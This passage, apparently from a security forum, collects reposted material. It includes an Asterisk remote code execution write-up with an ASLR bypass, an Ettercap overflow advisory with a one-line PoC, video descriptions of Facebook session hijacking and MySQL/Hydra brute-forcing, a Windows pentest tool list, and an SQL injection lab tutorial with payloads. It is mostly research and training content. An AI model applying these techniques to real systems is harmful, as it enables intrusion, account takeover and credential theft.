ast_tcptls_server_root calls the following thread creation wrapper to create a new thread and eventually call the worker function: ... 
if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) { ast_log(LOG_WARNING, "Unable to launch helper thread: %s\n", strerror(errno)); ast_tcptls_close_session_file(tcptls_session); ao2_ref(tcptls_session, -1); } ... The function ast_pthread_create_detached_background is a macro wrapper for the function ast_pthread_create_stack. The macro definition looks roughly like: ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...) The important thing to note here is the argument AST_BACKGROUND_STACKSIZE. This is used by the function to set the new thread's stack size attribute before starting the thread: pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE) ... return pthread_create(thread, attr, start_routine, data); For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the AST_STACKSIZE macros are defined as: #define AST_BACKGROUND_STACKSIZE AST_STACKSIZE #define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */ The use of AST_STACKSIZE, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread's stack. In turn, if a value of this size or greater is used for alloca pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread's stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art: Synchronizing the two threads such that they do not collide and clobber each other's critical stack contents is as simple as not sending data when a given thread is expecting it. 
While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be used once the second thread completes its initial read and resumes execution. Note why this sidesteps the fgets obstacle described above: a length such as 0x3C900 is an ordinary positive int, so fgets accepts it; the stack pointer is never wrapped at all, it is merely moved far enough down to land inside the neighbouring thread's stack mapping. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity. 1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads: 2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1's initial read operation finishes. It performs the alloca, subtracting its stack pointer by 0x3C900, which places its pointer for *buf at 0x900 bytes down from the top of Thread2's stack: 3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting (none of them a newline, which would end the fgets early). This advances the *buf pointer index used by fgets up the stack, closer to Thread2's current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900). 4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own alloca, subtracting from its stack pointer. 
Coordinating this length carefully places it precisely where the *buf pointer in Thread1 fgets currently points. Thread2 then calls fgets to receive its HTTP Content-Data, causing it to block while waiting to read in data. 5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current *buf index in fgets, and overwrites where Thread2's stored return address is for fgets. A return from fgets can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns, EIP is restored from the overwritten return address value and execution flow is controlled. Protection Mechanisms Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent-Executables (PIE) as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case. While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk built with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with. Who Was Phone I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. 
Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to. The function generic_http_callback in main/manager.c is the URL handling function executed when triggering the vulnerability, and is defined as: static int generic_http_callback(struct ast_tcptls_session_instance *ser, enum ast_http_method method, enum output_format format, struct sockaddr_in *remote_address, const char *uri, struct ast_variable *get_params, struct ast_variable *headers) { Above you can see the output_format argument format is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for "plain", "html", "xml" respectively. This value is used to retrieve a pointer from a global array when constructing a response in generic_http_callback: /* ... */ ast_str_append(&http_header, 0, "Content-type: text/%s\r\n" "Cache-Control: no-cache;\r\n" "Set-Cookie: mansession_id=\"%08x\"; Version=1; Max-Age=%d\r\n" "Pragma: SuppressEvents\r\n", contenttype[format], session->managerid, httptimeout); /* ... */ ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0); /* ... */ The contenttype array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread's *buf pointer to overwrite the stack memory where format is stored, so it indexes beyond the contenttype array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of contenttype. My code to do this with VDB is shown below. 
(Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post): for m in trace.getMemoryMaps(): # check memory map name if m[3].lower() == "/usr/sbin/asterisk": # check for flags Read & Write for data segment if m[2] == 6: addr = m[0] memlen = m[1] memory = trace.readMemory(addr, memlen) # check for Execute flag elif m[2] == 5: # save beginning and ending of executable memory code = m[0] codestop = code+m[1] # from each offset in the memory for offset in range(memlen-4): # read for the size of a pointer ptr = struct.unpack("<I", memory[offset:offset+4])[0] # check if it is a pointer if ispoi(ptr): # read the value at the pointer ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0] # is that value in the asterisk code? if ptr > code and ptr < codestop: print " [*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr) The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. Passing this check, the value at the memory it points to is then also checked to see if it is a pointer to code memory and then prints out valid matches. This script identified 8 locations of usable pointers when ran against Ubuntu's packaged Asterisk binary. By overwriting the saved format variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build. 
To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to fgets in the second thread. This buffer is populated with the second thread's received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function ast_safe_system, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process -- which often runs as root. Using this to spawn a remote shell with Ubuntu's default dash shell is a little obnoxious, but possible, and an exercise left up to the reader. Hope you enjoyed the post! -- Brandon Edwards @drraid Sursa: DoS? Then Who Was Phone?
[h=1]Ettercap <= 0.7.5.1 Stack Overflow Vulnerability[/h] Title: Ettercap Stack overflow (CWE-121) References: CVE-2012-0722 Discovered by: Sajjad Pourali Vendor: http://www.ettercap.sourceforge.net/ Vendor contact: 13-01-01 21:20 UTC (No response) Solution: Using the patch Patch: http://www.securation.com/files/2013/01/ec.patch Local: Yes Remote: No Impact: low Affected: - ettercap 0.7.5.1 - ettercap 0.7.5 - ettercap 0.7.4 and earlier Not affected: - ettercap 0.7.4.1 --- Trace vulnerable place: ./include/ec_inet.h:27-44 enum { NS_IN6ADDRSZ = 16, NS_INT16SZ = 2, ETH_ADDR_LEN = 6, TR_ADDR_LEN = 6, FDDI_ADDR_LEN = 6, MEDIA_ADDR_LEN = 6, IP_ADDR_LEN = 4, IP6_ADDR_LEN = 16, MAX_IP_ADDR_LEN = IP6_ADDR_LEN, ETH_ASCII_ADDR_LEN = sizeof("ff:ff:ff:ff:ff:ff")+1, IP_ASCII_ADDR_LEN = sizeof("255.255.255.255")+1, IP6_ASCII_ADDR_LEN = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1, MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN, }; ./include/ec_resolv.h:42 #define MAX_HOSTNAME_LEN 64 ./src/ec_scan.c:610-614 char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; ./src/ec_scan.c:633-635 if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 || *ip == '#' || *mac == '#' || *name == '#') continue; Root cause: the three %s conversions carry no maximum field width, so fscanf copies each whitespace-delimited token in full regardless of the destination size (47, 19 and 64 bytes respectively, per the definitions above), and an over-long token in the hosts file overflows these stack buffers. The conventional fix is to bound each conversion to one less than its buffer so the terminator fits, e.g. "%46s %18s %63s". The issue is rated local/low because the victim must load the attacker-supplied hosts list via -j. --- PoC: sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow --- + Sajjad Pourali + http://www.securation.com + Contact: sajjad[at]securation.com Sursa: Ettercap <= 0.7.5.1 Stack Overflow Vulnerability
Hijacking Facebook Accounts Over A Network Description: In this video I show you how to hijack Facebook accounts over a network using Ettercap, Wireshark, Grease Monkey and Cookie Injector. Note that this is a session-cookie replay attack: it only works while the session cookie crosses the network in cleartext (or is downgraded to plain HTTP, which is what the sslstrip step in the linked script is for), so a site that serves every page over HTTPS, marks its session cookie Secure and uses HSTS defeats it. You will need the following stuff for this to work. Backtrack Linux - Pentesting Operating System Wireshark - Packet Analyzer comes with Backtrack 5 Firefox - Browser comes with Backtrack 5+ Grease Monkey - Firefox addon Cookie Injector - Script to Dump Wireshark Data. Links: Backtrack Linux Download: BackTrack Linux - Penetration Testing Distribution Passsniffer.sh from video: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf Grease Monkey - Firefox addon: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ Cookie Injector for Grease Monkey: Original Cookie Injector for Greasemonkey Credits to tedbear for the Passsniffer.sh script. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Hijacking Facebook Accounts Over A Network
Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities Description: Abstract We present our work of using interactive static analysis to improve upon static analysis techniques by introducing a new mixed-initiative paradigm for interacting with developers to aid in the detection and prevention of security vulnerabilities. The key difference between our approach and standard static analysis is interaction with the developers. Specifically, our approach is predicated on the following principles: • Secure programming support should be targeted towards general developers who understand the application logic, but may have limited knowledge of secure programming; • Secure programming support should be provided while the code is being developed, integrated into the development tools; • Secure programming support should reduce the workload in detecting and resolving vulnerabilities; and • Developers should be able to provide feedback about the application context that can drive customized security analysis. We have performed evaluations of our approach using an active open source project, Apache Roller. Our results shows that interactive data flow analysis can potential reduce the effort of finding and fixing vulnerabilities by as much as 50%. Using interactive control flow analysis, we found cross request forgery vulnerabilities in current Roller release. The Roller team issued patches based on our report (CVE-2012-2380). We have also performed user studies, both for students and for professional developers with promising results. For example, preliminary data suggests that using ASIDE students, who do not have secure programming training, can write much more secure code. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. 
Original Source: Using Interactive Static Analysis for Early Detection of Software Vulnerabilities - Bill Chu on Vimeo Sursa: Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities
Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit Description: In this video I will show you how to perform a brute - force attack on Mysql and how to use John the Ripper Hash Cracking module in Metasploit Framework. When you are using John the Ripper Module, so make sure that your database is connected to Metasploit Framework or you will get an error. Modules are used .. auxiliary/scanner/mysql/mysql_version Enumerates the version of MySQL servers auxiliary/scanner/mysql/mysql_login This module simply queries the MySQL instance for a specific user/pass (default is root with blank). auxiliary/scanner/mysql/mysql_hashdump This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit
Fastest Router Hacking With Hydra - Official Video Description: THC-Hydra A very fast network logon cracker which support many different services. INTRODUCTION ------------ Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. Currently this tool supports: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. However the module engine for new services is very easy so it won't take a long time until even more services are supported. Your help in writing, enhancing or fixing modules is highly appreciated!! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Fastest Router Hacking With Hydra - Official Video
Windows Tools For Penetration Testing Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system. HashCheck Shell Extension The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files). Netcat Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Metasploit Framework The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. RealVNC Viewer Remote access software for desktop and mobile platforms. GetIf SNMP tool that allows you to collect information about SNMP devices. Cain & Abel Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. Wireshark Wireshark is a free and open-source packet analyzer. 
It is used for network troubleshooting, analysis, software and communications protocol development. PuTTY PuTTY is an SSH and telnet client for the Windows platform. Pass The Hash Toolkit The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes. Cachedump Recovering Windows Password Cache Entries. Fport Identify unknown open ports and their associated applications. Nbtscan This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Winfo Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed. ClearLogs ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer. SQLDict SQLdict is a dictionary attack tool for SQL Server. PMDump PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process. GrabItAll GrabItAll performs traffic redirection by sending spoofed ARP replies. 
It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too. DumpUsers DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1. BrowseList BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading). Remoxec Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation). WMICracker Brute-force tool for Windows Management Instrumentation (WMI). Venom Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled. SMBAT The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms. RPCScan RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. LSASecretsDump LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window. SQLPing SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever. OAT The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers. 
Pwdump7 Extract password hashes from local user accounts. PsTools The PsTools package provides a set of command line utilities that allow you to manage local and remote systems. Incognito Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators. DumpSec DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information. X-Deep32 X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc. LC5 Windows password cracker. Ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. SiVuS SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations. Sursa: Windows Tools For Penetration Testing
SQL Injections: An Introduction Audi-1 January 07, 2013 According to the Open Web Application Security Project (OWASP), injection attacks are first on the list of the top 10 web vulnerabilities. Diving into these, SQL injections are responsible for a big chunk of this. Exploitation of SQL injections is often trivial. This vulnerability is not just web related but can also occur in desktop applications that use SQL server backends. The detectability of these vulnerabilities depends on the complexity of the application in question. Most times, point-and-shoot tools fail to successfully detect these vulnerabilities. Sometimes there is difficulty in putting the desired conditions to successfully exploit the injections into these point-and-click tools, causing the vulnerability to go unnoticed. The primary defence against these flaws is to keep untrusted data out of the query text altogether: build queries with parameterized statements (prepared statements with bound variables) or a data-access API that does so, so that user input is never parsed as SQL. White-list input validation (accept only the values the application actually needs) and correct output encoding are worthwhile defence in depth, but sanitizing or escaping input on its own is error-prone and should not be the only control. SQLI-LABS is an attempt to walk through the process of SQL injections in a dumb way. The focus is on understanding the core concepts, making it easy to be followed by people who are learning to break into the field of security and penetration testing. To help the learning process, a test bed has been prepared which can be followed along with this post. One can also follow the video explanations for each lesson for brief explanations about the topic. The test bed can be grabbed from https://github.com/Audi-1/sqli-labs. You can follow readme.txt for installation instructions or can watch the brief video. What are SQL injections? 
An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data into the input fields of an application, which, when processed by the application, causes that data to be executed as a piece of code by the back end SQL server, thereby giving undesired results which the developer of the application did not anticipate. The backend server can be any SQL server (MySQL, MSSQL, ORACLE, POSTGRESS, to name a few) The ability of the attacker to execute code (SQL statements) through vulnerable input parameters empowers him to directly interact with the back end SQL server, thereby leveraging almost a complete compromise of system in most cases. What are different types of SQL injections? SQL injections can be classified and categorized in different ways, based on the type of data extraction channel, the response received from server, how server responses aid in leveraging the successful exploitation, impact point, etc. Based on the data extraction channel Inband or inline Out-of-band SQL injections that use the same communication channel as input to dump the information back are called inband or inline SQL Injections. This is one of the most common methods, readily explained on the Internet in different posts. For example, a query parameter, if injectable, leads to the dumping of info on the web page. Injections that use a secondary or different communication channel to dump the output of queries performed via the input channel are referred to as out-of-band SQL injections. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. Based on the response received from the server Error-based SQL injections Union query type. Double query Injections. Blind SQL Injections Boolean-based blind injections. Time based blind injections. 
Error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application, and these errors aid in successful exploitation. In the image below, the yellow line displays the error. These will be discussed further in this post and in related posts to come. Blind SQL injections are those in which the back-end database reacts to the input, but the errors are somehow concealed by the web application and not displayed to the end users, or the output is not dumped directly to the screen. The name “blind” therefore comes from the fact that the attacker injects blindly, relying on calculated assumptions and trial and error. Based on how the input is treated in the SQL query (what data type): string-based, or numeric-/integer-based. Based on how the input parameter is treated in the back-end SQL query, an injection can be classified as string- or integer-based. Based on the degree/order of injection (where the impact happens): first-order injections and second-order injections. The degree or order of an injection identifies the way in which the injection yields its output. If the injection directly delivers the result, it is considered a first-order injection; but if the injected input yields no successful result in extraction and instead affects some other result, which the attacker can take advantage of on some other place/page, it is called a second-order injection. Consider second-order injections similar to stored XSS, where the input is stored in the application and later rendered on some other page, thereby impacting that page indirectly because of the initial malicious input. Based on the injection point location: injection through user input form fields, injection through cookies, and injection through server variables (header-based injections). Why does SQL injection happen?
Generally, when an application communicates with the back-end database, it does so in the form of queries with the help of an underlying database driver. This driver depends on the application platform being used and on the type of back-end database, such as MySQL, MSSQL, DB2, or Oracle. A generic login query would look something like this: `SELECT Column1, Column2, Column3 FROM table_name WHERE username='$variable1' AND password='$variable2';` We can split this query into two parts, the code section and the data section. The data section is $variable1 and $variable2, and quotes are used around each variable to define the string boundary. Let us walk through the process in a crude way. Say that at the login form the username entered is Admin and the password is p@ssw0rd; these are collected by the application and the values of $variable1 and $variable2 are placed at their respective locations in the query, making it something like this: `SELECT Column1, Column2, Column3 FROM table_name WHERE username='Admin' AND password='p@ssw0rd';` Now, the developer assumes that users of his application will always supply a username and password combination that yields a valid query for evaluation by the database back end. What if the user is malicious and enters some characters which have a special meaning in the query, for example a single quote? So, instead of entering Admin, he enters Admin', thereby causing an error to be thrown by the DB driver. Why? Because the unpaired quote entered by the user breaks the query syntax the application relies on. We will discuss the process in detail. To summarize: whenever an attacker is able to escape the data boundaries, he can append data which then gets interpreted as code by the DB driver and is executed on the SQL back end, thereby causing SQL injection. ERROR-based SQL injections In general, all programming languages give developers the flexibility to debug and fix their applications by using some built-in error-handling functions/libraries.
These could be some explicit function, classes, or methods that deliver friendly error messages so that the troubleshooting experience can be streamlined and detecting the part of code responsible for raising those exceptions can be easier. These functions should be controlled before an application goes to production because they can dump a lot of sensitive info about the application and underlying logic, thereby making it easy for a bad guy to exploit the application. Therefore, those applications where these error-handling functions are available to aid in gaining useful info about the application or in dumping the database info by means of SQL interaction are classified as error-based SQL Injections. Based on the way data is extracted using helpful errors, the error-based injections can be classified into two main types: Union-query type Double-query type Let’s discuss the process of SQLi in detail. To do so, let us consider Lessons 1 to 4. We will continue to explore the further lessons of Labs in coming posts. For the purpose of demonstration, I have installed the SQLI-LABS under the /var/www location on my Backtrack installation. Download and follow the install instructions to set it up to follow along. A methodological approach is always helpful in understanding the underlying logic. The major process is as follows: Enumerate the application behavior Fuzz the application with bogus data with the goal of crashing the application Try to control the injection point by guessing the query used in the backend Extract the data from the back end database Enough theory, time for some action. ENUMERATION: Let us start with enumeration of the applications. Lessons 1 to 4 look almost identical. When we load the page for Less-1, it asks us to input ID as a GET parameter, which should be a numeric value. Providing the ID as a numeric value, we see a specific username and password on screen when the value of ID is between 1 through 14. 
For any other value, we see nothing being displayed on screen. ANALYSIS of ENUMERATION id=15 => No output on screen. ID=1 => Login name= Dumb, Password=Dumb ID=2 => Login name= Angelina, Password=I-kill-you ID=3 => Login name= Dummy, Password=p@ssw0rd ID=4 => Login name= secure, Password=crappy ID=5 => Login name= stupid, Password=stupidity ID=6 => Login name= superman, Password=genious ID=7 => Login name= batman, Password=mob!le ID=8 => Login name= admin, Password=admin ID=9 => Login name= admin1, Password=admin1 ID=10 => Login name= admin2, Password=admin2 ID=11 => Login name= admin3, Password=admin3 ID=12 => Login name= dhakkan, Password=Dumbo ID=13 => Login name= admin4, Password=admin4 ID=14 => Login name= admin5, Password=admin5 ID=15 => No output on screen. ID=20 => No output on screen. ID=100 => No output on screen. Result of Enumeration: The database seems to have 14 records in the table and for any non-existent value ID it returns an empty set. FUZZING: Generally the developer of the application assumed that the user would input integer values. After we have enumerated the application work flow, we try to fuzz all input points of the application. So what exactly is Fuzz? It is a process for supplying arbitrary dumb patterns as input with the objective to see application behavior and try to find the discrepancies in the responses. The discrepancies indicate the possibility of vulnerability. We will fuzz all the four lessons together one by one. Below are some arbitrary inputs which we can add, append and use for purpose of detecting basic error based SQLi: ‘ “ \ ; %00 ) ( aaa Integer or string test: Because the input parameter seems to be integer value, let us try to input a string value for ID parameter and observe the behavior. 
Less-1 http://localhost/sqli-labs/Less-1/?id=asdf Less-2 http://localhost/sqli-labs/Less-2/?id=asdf Less-3 http://localhost/sqli-labs/Less-3/?id=asdf Less-4 http://localhost/sqli-labs/Less-4/?id=asdf Result of the integer and string test: We see that Less-1, Less-3, and Less-4 respond by returning the empty set, whereas Less-2 behaves differently; it displays a MySQL error message on screen. From very basic programming know-how, we know that a string parameter is always wrapped in single or double quotes, whereas integers are used as is. Therefore we can assume that Less-1, -3, and -4 are using some sort of quotes to wrap around the user input. They treat the string entered as a non-existent value in the database and therefore respond with the empty set. Less-2 is producing a MySQL alert, meaning that no quotes are used around the input parameter; therefore integer values work fine in the query but strings cause an error. Therefore we can deduce that Less-1, Less-3, and Less-4 are string-based injections and Less-2 is an integer-based injection. Fuzzing continued: Now let us take the fuzz characters further and try them against Less-1 through -4 one by one. Less-1 http://localhost/sqli-labs/Less-1/?id=1' Less-2 http://localhost/sqli-labs/Less-2/?id=1' Less-3 http://localhost/sqli-labs/Less-3/?id=1' All three produce a similar kind of error message with a very minute difference. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1’ at line 1 And Less-4 does not produce any alert with the injection of a single quote. http://localhost/sqli-labs/Less-4/?id=1' Trying the same exercise with a double-quote injection, we observe that this time only Less-4 crashes the application, and Less-1, Less-2, and Less-3 no longer crash.
Therefore, from the above tests, we have discovered that the applications Less-1, Less-2, and Less-3 react to a single-quote injection and Less-4 reacts to a double-quote injection. Time to discover the underlying query used by the applications with the info gained above. We know that Less-1, Less-3, and Less-4 are string-based and Less-2 is numeric. Let us confirm this further by injecting a backslash, which is the escape character used to print characters that have a special meaning in SQL (for example, to print a ' inside a string we write it as \' so the quote is not evaluated as a delimiter but treated as an ordinary character). Appending ID=1\ yields the following output: For Less-1 Because we input 1\, let's look at the part of the error dumped on the screen containing 1\, which is near ‘ ’1\’ LIMIT 0,1’ at line 1. We observe that after our input 1\ a single quote is visible, indicating that single quotes are used as the wrapper for the string. Let's take Less-2 and try the same. Our input is the same, but the output differs slightly from Less-1: near ‘ ’1\ LIMIT 0,1’ at line 1. After our input 1\ there are no quotes, again proving that Less-2 is an integer-based injection and does not need any quotes to break the query. Still confused? Let us do the same test with Less-3 and Less-4 and it will get clearer as we progress. Let us do the same test with Less-3: The error message is near ‘ ’1\’) LIMIT 0,1’ at line 1. In this lesson, with the same input of 1\, we see ') after our input, indicating that the developer of the application has wrapped the variable inside parentheses ('variable'). Let's do the same with Less-4: The error message is near ‘ “1\”) LIMIT 0,1’ at line 1. In this lesson, with the same input of 1\, we see ") after our input, indicating that the developer of the application has wrapped the variable inside parentheses ("variable").
Building up the query used behind the scenes in the applications: Less-1: SELECT * FROM TABLE_NAME WHERE ID='$ID' LIMIT 0,1 Less-2: SELECT * FROM TABLE_NAME WHERE ID=$ID LIMIT 0,1 Less-3: SELECT * FROM TABLE_NAME WHERE ID=('$ID') LIMIT 0,1 Less-4: SELECT * FROM TABLE_NAME WHERE ID=("$ID") LIMIT 0,1 COMMENTING OUT THE QUERY Until now, we have been able to detect the injection flaw and to guess a pseudo query with details on what is used as the string delimiter or wrapper around the variable. One thing we need to understand is that during the injection we can only control the variable, not the delimiters used around it; therefore as soon as we inject an extra delimiter, it induces a syntax error. For a successful injection, we should close the open delimiter wrapped around the variable in the query, thereby making it possible for us to escape the string/integer boundary and execute SQL statements, and we must also handle the closing delimiter around the variable, which becomes stale. This can be done in two ways. One way is by commenting out the rest of the query, and the second is by adding an extra delimiter with extra values to make the query syntactically correct. Let us take an example: Less-1: SELECT * FROM TABLE_NAME WHERE ID=' $ID ' LIMIT 0,1 In place of $ID we put the value 1', and the query becomes something like SELECT * FROM TABLE_NAME WHERE ID=' 1' ' LIMIT 0,1 Now this query is syntactically incorrect and needs to be fixed for execution. We found and confirmed that by adding an extra quote for Less-1 we can successfully escape the string boundary, but we need to fix the extra ' which is there as part of the original query. Way one: We can use SQL comments to fix the syntax. MySQL supports three comment styles: -- (which must be followed by a whitespace character, hence the trailing +, which URL-decodes to a space), #, and /* */, so our injection can be 1' --+ or 1' #. So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID=' 1'--+ ' LIMIT 0,1 SELECT * FROM 